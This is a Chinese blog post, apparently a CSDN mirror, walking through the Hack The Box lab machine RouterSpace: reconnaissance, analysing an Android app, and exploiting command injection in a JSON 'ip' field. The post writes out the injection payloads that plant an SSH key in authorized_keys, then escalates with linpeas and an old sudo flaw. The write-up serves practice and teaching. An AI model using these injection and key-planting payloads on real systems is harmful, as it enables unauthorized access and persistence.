当前位置:网站首页>hack the box:RouterSpace题解

hack the box:RouterSpace题解

2022-06-28 07:01:00 zr1213159840

先是正常的扫描,nmap,masscan,whatweb都上。

nmap -Pn -A 10.10.11.148
masscan --ports 10.10.11.148
whatweb 10.10.11.148

总结出如下信息:
1.开放了22和80端口
在这里插入图片描述

2.whatweb信息如下:
在这里插入图片描述
3.打开页面看看
在这里插入图片描述
以上总结出的信息没有太大作用,爆破下目录看看

dirsearch -u 10.10.11.148

发现这几个路径
在这里插入图片描述

随便输入一个进入后发现,会被拦截,此时第一个想法是绕过,尝试了大小写等各种方法,发现无法绕过,重放改包也不行。
在这里插入图片描述

第二个想法来自于点击右上角的download,会显示下载的路径,同时会下载下来apk的包。
在这里插入图片描述
尝试越权,也没用,完了,我不会,开摆了。

既然有app的话,那不如下载下来看看,用一些apk的分析工具分析一下看看,用的是apkanalyser。可以自行下载使用。
在这里插入图片描述
新建一个apps文件夹,然后将下载下来的文件进行解析,查找url等等相关信息,也没找到什么有用的。
在这里插入图片描述
但是,在运行期间,发现了这个,有点熟悉啊
在这里插入图片描述

routerspace.htb

因为被这个折磨过太多次,印象太深了,编辑hosts文件,然后访问试试。
tmd,还是原来的界面,这没法玩了。
在这里插入图片描述
不会要对app进行抓包吧?
根据这个链接,安装fiddler+夜神模拟器,下载提供的app,安装后抓包。

https://blog.csdn.net/21aspnet/article/details/103977908

界面
在这里插入图片描述
获取到的包从fiddler中转出,能发现只存在一个请求,就是点击上图的check status按钮发出的。

在这里插入图片描述
导出后如下图所示
在这里插入图片描述
放入bp中重放一下试试
在这里插入图片描述
执行下命令,发现能执行!
在这里插入图片描述好了,这下有操作空间了。
我的第一想法是直接读取shadow文件进行密码破解,但是发现无法回显,什么都没有。
在这里插入图片描述
passwd以及group文件都可以查看,sudoers不行
在这里插入图片描述
在这里插入图片描述
由于打开了22端口,那能不能动一下.ssh文件呢?尝试一下
改包

{"ip":"0.0.0.0|echo test >/home/paul/.ssh/123.txt|ls -al /home/paul/.ssh/"}

发现能写入
在这里插入图片描述
与之前出现过的靶机相同,我们可以修改.ssh文件,然后通过ssh登录进去。原理步骤可参考这个链接

https://www.csdn.net/tags/OtTaQgwsMTk4MDctYmxvZwO0O0OO0O0O.html

本地生成id_rsa文件,然后将这个文件内容写入到靶机的.ssh文件夹下面

本地kali执行
ssh-keygen -t id_rsa
cat id_rsa

在这里插入图片描述
在这里插入图片描述
使用bp写入靶机.ssh文件夹中

{"ip":"0.0.0.0|echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBAxsuWvSvZCfCUmzJ5MMPv911a1pligTpQIo7M4RUMCDLKh4tA+bWIoOb72U5C6QBiFAnYaKRlmRqCnk5gS+WoKP4sI4ADln6or8u6+jqtW7qx+CGK9uG8p7du3TxN7KZw6YVrJxaASkPluKibgwEmqlVjHfWdwW0ZEJaqr/JFjqmEseKvVdWeFS6aq/m54rhlE8cQnYQg3csnO5I73/FSH1U1sOWir8fdht1zi19x5Yay+lWOBIYH/cNIBtE+Kw1br3OKmkcEhA9YV8K1wBh33AFrpwMrAD+PcsPmqYnav/r2raRA/LUrIXm8SmQsRgsW96DaBcUUMAP1DuJXo+dh0gb5BPCd2xa+chGZEjp3VuLI71K3u4d7ByHa60bRQ25SjK1OL6fo3TuSwCto5r5d16Ci1XG7k45YwB9jhhLLaOdbFyHzNxjQhUEVTkKoq1a5LvFjcD+ZS/4BN1yozD0TaCoY8CkgkGwOLc1hrgNsdZjH7zkI36/EwyMWASf9vE= [email protected]' >/home/paul/.ssh/authorized_keys|ls -al /home/paul/.ssh/"}

修改一下文件权限

{"ip":"0.0.0.0|chmod 700 /home/paul/.ssh/authorized_keys"}

在这里插入图片描述
在kali上登录,进入靶机

ssh [email protected] -i /home/kali/Desktop/id_rsa

在这里插入图片描述
拿到用户的flag
在这里插入图片描述

下面就要提权,拿到root的flag,提权使用linpeas.sh,这个地方不给使用wget,虽然有nc,但是我怎么都连接不了,无奈之下只好复制粘贴了,笨人有笨方法。
复制粘贴后运行linpeas.sh

vi linpeas.sh
粘贴复制的内容
./linpeas.sh

在这里插入图片描述
通过测试,可以使用旧版本的sudo提权
在这里插入图片描述
顺着sudo提权找到这个链接
在这里插入图片描述
分别复制粘贴以下几个文件的内容,直接提权成功!
在这里插入图片描述
拿到最终的key
在这里插入图片描述
参考了以下内容:
https://blog.csdn.net/weixin_45007073/article/details/123341343

原网站

版权声明
本文为[zr1213159840]所创,转载请带上原文链接,感谢
https://blog.csdn.net/zr1213159840/article/details/125473600

边栏推荐

猜你喜欢

随机推荐